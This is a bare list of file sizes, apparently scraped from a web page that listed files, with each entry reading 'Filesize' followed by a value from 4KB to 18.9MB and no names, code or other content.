Filesize
136KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
84KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
18.8MB
-
Filesize
164KB
-
Filesize
288KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
18.8MB
-
Filesize
36KB
-
Filesize
696KB
-
Filesize
696KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
868KB
-
Filesize
1.3MB
-
Filesize
456KB
-
Filesize
456KB
-
Filesize
1.6MB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
472KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
8KB
-
Filesize
124KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
140KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
18.9MB
-
Filesize
4KB
-
Filesize
116KB
-
Filesize
1.3MB
-
Filesize
1.3MB
-
Filesize
18.8MB
-
Filesize
456KB
-
Filesize
308KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
1.0MB
-
Filesize
372KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
456KB
-
Filesize
4KB